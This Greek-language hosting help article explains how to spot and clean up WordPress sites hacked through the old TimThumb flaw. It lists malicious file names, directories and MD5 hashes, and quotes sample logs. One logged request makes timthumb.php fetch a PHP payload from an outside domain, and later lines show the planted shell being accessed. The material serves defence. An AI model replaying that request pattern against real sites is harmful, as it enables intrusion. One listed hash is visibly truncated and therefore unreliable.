Παραβίαση του WordPress: TimThumb
Το TimThumb είναι ένα εργαλείο που χρησιμοποιείται από θέματα και προσθήκες του WordPress για την προσαρμογή μεγέθους εικόνων. Οι παλαιότερες εκδόσεις του TimThumb διαθέτουν μια ευπάθεια ασφάλειας, η οποία επιτρέπει στους εισβολείς να κάνουν αποστολή κακόβουλων αρχείων από έναν άλλο ιστότοπο. Το πρώτο κακόβουλο αρχείο επιτρέπει στον εισβολέα να κάνει αποστολή περισσότερων κακόβουλων αρχείων στον λογαριασμό φιλοξενίας.
Για περισσότερες πληροφορίες σχετικά με τις παραβιάσεις και τον τρόπο με τον οποίο μπορείτε να τις αντιμετωπίσετε, ανατρέξτε στο άρθρο Τι συμβαίνει αν ο ιστότοπός μου παραβιαστεί;.
Ενδείξεις παραβίασης
Εκτός από τις ενδείξεις που αναφέρονται στο άρθρο Τι συμβαίνει αν ο ιστότοπός μου παραβιαστεί;, μπορείτε να καταλάβετε ότι ο ιστότοπός σας έχει επηρεαστεί από αυτήν την συγκεκριμένη παραβίαση, αν ο λογαριασμός σας περιέχει αρχεία με τα ακόλουθα μοτίβα σε έναν κατάλογο προσθηκών:
- external_[md5 hash].php — για παράδειγμα: external_dc8e1cb5bf0392f054e59734fa15469b.php
- [md5 hash].php — για παράδειγμα: 7eebe45bde5168488ac4010f0d65cea8.php
Μπορείτε να βρείτε παραδείγματα πιθανών κατακερματισμών md5 στην ενότητα Αθροίσματα MD5 γνωστών κακόβουλων αρχείων αυτού του άρθρου.
Επίσης, ενδέχεται να βρείτε τα ακόλουθα αρχεία στον ριζικό κατάλογο του ιστότοπού σας (περισσότερες πληροφορίες):
- x.txt
- logx.txt
Επιδιορθώσεις
Πρέπει να καταργήσετε όλα αυτά τα παραβιασμένα και κακόβουλα αρχεία. Πριν διαγράψετε οτιδήποτε, συνιστούμε να δημιουργήσετε ένα αντίγραφο ασφαλείας του ιστότοπού σας (περισσότερες πληροφορίες).
Εντοπισμός κακόβουλων αρχείων
Τα κακόβουλα αρχεία που αποστέλλονται αρχικά μέσω της ευπάθειας TimThumb συνήθως βρίσκονται σε έναν από τους ακόλουθους καταλόγους, οι οποίοι βρίσκονται στον κατάλογο /theme
ή /plugin
που περιέχει το ευπαθές αρχείο TimThumb.
- /tmp
- /cache
- /images
Παραδείγματα θέσεων κακόβουλων αρχείων:
[webroot]/wp-content/themes/[θέμα με ευπαθές TimThumb]/cache/images/
Παραδείγματα ονομάτων κακόβουλων αρχείων σε αυτές τις θέσεις:
- ef881b33fba49bd6ad1818062d071a9c.php
- db648d44074f33a8857066b97290d247.php
- 3cf739debc9340540c923bbf3b73044b.php
- dc33a2e36d3179a06278191088c2ef35.php
- 8377cb73d30655dc2cbf906c9310da56.php
- eb117b212e2906f52c0a0c9132c6c07a.php
- a4924ec23939d2410354efbb8d4ddd06.php
- vvv3.php
- ea90e1e4d7ba30848f70b13d616c6ed4.php
- 236268f2a06e4153365b998d13934eb9.php
- 6a4fa516943e2fa09e3704486075de9f.php
- 896c4eb4ff2581f6e623db1904b80a44.php
- wp-images.php
Τα αρχεία x.txt
και logx.txt
θα περιέχουν πληροφορίες σχετικά με την ημερομηνία δημιουργίας ενός κακόβουλου αρχείου χρησιμοποιώντας την ευπάθεια TimThumb και τη θέση του κακόβουλου αρχείου εντός του λογαριασμού φιλοξενίας. Αυτές οι πληροφορίες μπορούν να σας βοηθήσουν να προσδιορίσετε τα αρχεία που πρέπει να καταργήσετε και τη θέση στην οποία βρίσκονται. Ωστόσο, αυτές οι πληροφορίες μάλλον δεν θα παρέχουν μια πλήρη λίστα των αρχείων που πρέπει να καταργηθούν.
Ένα παράδειγμα:
Διεύθυνση IP: X.X.X.X
Πρόγραμμα περιήγησης: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[θέμα με ευπαθές TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone
Αρχεία για κατάργηση
Όταν δημιουργήσετε ένα αντίγραφο ασφαλείας του ιστότοπού σας, καταργήστε τα ακόλουθα αρχεία:
- x.txt
- logx.txt
- external_[md5 hash].php — για παράδειγμα: external_dc8e1cb5bf0392f054e59734fa15469b.php
- [md5 hash].php — για παράδειγμα: 7eebe45bde5168488ac4010f0d65cea8.php
- Άλλα κακόβουλα αρχεία PHP που εντοπίστηκαν με αρχεία τα ονόματα των οποίων περιέχουν τον κατακερματισμό md5.
Μπορείτε να το κάνετε αυτό μέσω FTP (περισσότερες πληροφορίες) ή μέσω του προγράμματος διαχείρισης αρχείων στον πίνακα ελέγχου για τον λογαριασμό φιλοξενίας σας (περισσότερες πληροφορίες).
Επίσης, θα πρέπει να:
- Ενημερώσετε όλα τα θέματα και τις προσθήκες στην τελευταία έκδοση.
- Αντικαταστήσετε τυχόν στιγμιότυπα του
TimThumb.php
με την πιο πρόσφατη έκδοση, η οποία είναι διαθέσιμη εδώ.
Τεχνικές πληροφορίες
Δείγμα αρχείων καταγραφής HTTP
x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
Αθροίσματα MD5 γνωστών κακόβουλων αρχείων
- 2c4bcdc6bee98ed4dd55e0d35564d870
- 10069c51da0c87ad904d602beb9e7770
- 8855aecb5c45a5bfd962b4086c8ff96a
- 526a4cf1f66f27a959a39019fdf1fae9
- 161d2e53c664bd0fe1303017a145b413
- 39f186a0f55b04c651cbff6756a64ccc
- f67ca8f0bac08f5e8ccab6013b7acf70
- 747c7afcda0eef0eff6ed6838494c32
- cfdf59a58057b62f4707b909bcbd4577